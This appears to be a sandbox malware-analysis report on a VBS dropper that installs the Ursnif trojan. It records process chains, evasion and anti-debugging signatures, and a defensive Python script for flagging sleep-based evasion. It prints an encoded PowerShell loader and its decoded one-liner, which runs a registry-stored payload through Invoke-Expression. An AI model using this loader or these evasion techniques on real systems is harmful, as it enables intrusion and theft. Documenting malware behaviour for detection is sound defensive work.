Source: unknown | Process created: C:\Windows\System32\forfiles.exe 'C:\Windows\System32\forfiles.exe' /p C:\Windows\system32 /s /c 'cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==' /m p*ll.*e
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c 'powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75012 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75016 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9488 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75022 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9494 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75028 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75034 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9506 /prefetch:2
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\cmd.exe /c 'powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samples
Source: Nuovo documento 1.vbs | Static file information: File size 8681858 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Unpacked PE file: 4.2.PaintHelper.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Unpacked PE file: 4.2.PaintHelper.exe.400000.0.unpack
Compiles C# or VB.Net code
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00401A88 GetModuleHandleW,LoadLibraryW,GetProcAddress, 4_2_00401A88
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00401C83 push ecx; ret 4_2_00401C93
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006BB7C0 push edx; ret 4_2_006BB94E
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B6056 push cs; retf 4_2_006B6058
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B64DE push ebx; ret 4_2_006B64DF
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B2900 push cs; iretd 4_2_006B2901
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B09E2 push edx; iretd 4_2_006B09ED
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B11E6 push ecx; ret 4_2_006B11E7
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B05DD push edx; ret 4_2_006B05E2
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B5F0E push ecx; ret 4_2_006B5F27
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_006B47AF pushfd ; iretd 4_2_006B47B0
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_0072B3DF push ecx; ret 4_2_0072B3EF

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (101 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX (14 identical entries collapsed)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477 (this value is Int64.MaxValue / 10000, the millisecond count of TimeSpan.MaxValue: the thread never wakes on its own)
Found WSH timer for JavaScript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1599
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_4-4625
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-5304
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4808  Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 3688  Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788  Thread sleep count: 2891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788  Thread sleep count: 1599 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488  Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Last function: Thread delayed
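The sleep indicators above can be scored automatically. The script below is an added example (not Joe Sandbox code): it parses behaviour lines of the shapes shown in this section, buckets each sleep against the report's 30 s, 3 min and "count > 30" thresholds, and recognises 922337203685477 as Int64.MaxValue / 10000, the millisecond count of TimeSpan.MaxValue, i.e. a sleep the thread never returns from. The sample lines are constructed to mirror the entries above. The script assumes the numbers are milliseconds even where an "s" suffix is printed, which is consistent with the identical powershell.exe "delay time" and "sleep time" figures.

```python
"""Flag sleep-based sandbox evasion in behaviour-log lines.

Added example for this report, not Joe Sandbox code. The line shapes follow
the 'Thread delayed', 'Thread sleep time/count', 'Window found' and
'Last function' entries in this section; SAMPLE_LINES are constructed.
Assumption: the numbers in these entries are milliseconds even where the
report prints an 's' suffix (the powershell.exe 'delay time' and 'sleep time'
figures are identical, and 30000 matches the 30 s single-sleep threshold).
"""
import re

EVASIVE_SLEEP_MS = 30_000          # single sleep at or above the report's 30000 threshold
LONG_SLEEP_MS = 3 * 60 * 1000      # the 'Contains long sleeps (>= 3 min)' signature
LOOP_COUNT_THRESHOLD = 30          # the 'sleep count > 30' rule
# Int64.MaxValue / 10000 == TimeSpan.MaxValue in milliseconds. A sleep of this
# length never returns; the process parks itself until the sandbox times out.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

_PROC = re.compile(r"Source: (\S+\.exe)")
_DELAY = re.compile(r"Thread delayed: delay time: (\d+)")
_SLEEP = re.compile(r"Thread sleep time: -(\d+)s")
_COUNT = re.compile(r"Thread sleep count: (\d+)")
_TIMER = re.compile(r"Window found: window name: (WSH-Timer)")
_LAST = re.compile(r"Last function: (Thread delayed)")

# Constructed lines modelled on the entries above (paths and TIDs as reported).
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer",
    r"Source: C:\Windows\System32\wscript.exe TID: 4808 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788 Thread sleep count: 2891 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788 Thread sleep count: 12",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\System32\conhost.exe Last function: Thread delayed",
]


def classify_sleep(ms):
    """Bucket one sleep length given in milliseconds."""
    if ms >= TIMESPAN_MAX_MS:
        return "infinite"
    if ms >= LONG_SLEEP_MS:
        return "long"
    if ms >= EVASIVE_SLEEP_MS:
        return "evasive"
    return "short"


def _process_name(line):
    m = _PROC.search(line)
    return m.group(1).rsplit("\\", 1)[-1].lower() if m else "?"


def scan(lines):
    """Return (indicator, process, value) tuples for every evasive entry."""
    findings = []
    for line in lines:
        proc = _process_name(line)
        m = _DELAY.search(line) or _SLEEP.search(line)
        if m:
            ms = int(m.group(1))
            kind = classify_sleep(ms)
            if kind != "short":
                findings.append(("sleep_" + kind, proc, ms))
            continue
        m = _COUNT.search(line)
        if m:
            count = int(m.group(1))
            if count > LOOP_COUNT_THRESHOLD:   # many short sleeps: a stalling loop
                findings.append(("sleep_loop", proc, count))
            continue
        m = _TIMER.search(line) or _LAST.search(line)
        if m:
            tag = "wsh_timer" if m.re is _TIMER else "stopped_in_sleep"
            findings.append((tag, proc, m.group(1)))
    return findings


def indicators(findings):
    """Distinct indicator names, sorted, for a one-line verdict."""
    return sorted({f[0] for f in findings})


if __name__ == "__main__":
    hits = scan(SAMPLE_LINES)
    for hit in hits:
        print(hit)
    print("verdict:", "evasive" if hits else "clean", indicators(hits))
```

Run as a script it prints one tuple per flagged line and the set of indicator names. The "infinite" bucket is worth keeping separate from "long": a 3 minute sleep is a stalling tactic that a longer analysis window defeats, whereas a TimeSpan.MaxValue sleep means the stage will only ever run on a host where something else (a timer, a second thread, a restart) wakes it.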
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory). Caveat: the strings below are Windows' own Hyper-V / Host Compute Service message text, present on any Windows 10 install, so their presence in wscript.exe memory is a weak indicator on its own.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp  Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp  Binary or memory string: Hyper-V RAWystem32\stdole2.tlbe
Source: wscript.exe, 00000000.00000003.713739652.000002A59CA05000.00000004.00000001.sdmp  Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp  Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp  Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.721709131.000002A59C6C0000.00000002.00000001.sdmp  Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit points
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  API call chain: ExitProcess graph end node graph_4-5608
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Code function: 4_2_00401A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,  4_2_00401A88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Code function: 4_2_00401015 EntryPoint,GetModuleHandleA,GetProcessHeap,GetCurrentThread,WaitForSingleObject,ExitProcess,  4_2_00401015
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Memory protected: page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe  File created: PaintHelper.exe.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe  Network Connect: 89.191.225.207 80 (note: wscript.exe is the script host running the submitted VBS, so the script's own download logic rather than injection accounts for this connection; the PE it dropped, listed just above, supports that reading)
Encoded PowerShell command line found (-ec, short for -EncodedCommand: Base64 over UTF-16LE, an encoding rather than encryption)
Source: unknown  Process created: Base64 decoded iex (gp 'HKCU:\Software\Magiclo').R
Source: C:\Windows\System32\cmd.exe  Process created: Base64 decoded iex (gp 'HKCU:\Software\Magiclo').R
The decoded one-liner reads the value R under HKCU\Software\Magiclo and passes it to Invoke-Expression, so the next stage is stored in the registry and executed from memory without a script file on disk.
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
The csc.exe /noconfig /fullpaths @*.cmdline invocation followed by cvtres.exe is the .NET CodeDom compiler pipeline that PowerShell's Add-Type uses, so the PowerShell stage compiled C# at run time rather than loading a prebuilt assembly.
May try to detect the Windows Explorer process (often used for injection)
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp  Binary or memory string: Progman
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
Source: PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp  Binary or memory string: =Program Managerb

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Code function: 4_2_0072857D cpuid  4_2_0072857D
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Code function: 4_2_00721308 GetSystemTimeAsFileTime,  4_2_00721308
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  Code function: 4_2_00419AA0 IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,IsClipboardFormatAvailable,GetEnhMetaFileA,GetUserNameA,DeleteMetaFile,CreateMetaFileA,CharNextA,StrokePath,IsCharAlphaW,EndDoc,InSendMessage,GetMenuCheckMarkDimensions,GetParent,CreateMetaFileW,LoadCursorW,LoadLibraryA,GetProcAddress,  4_2_00419AA0
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe  WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match  File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match  (the same 34 memory-dump matches on region 00000000033E0000 of PaintHelper.exe and the PID 4196 process-memory match listed under Stealing of Sensitive Information above)

Malware Configuration

No configs have been found

Behavior Graph

(Interactive graph not reproduced in this text. Legend node types: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.)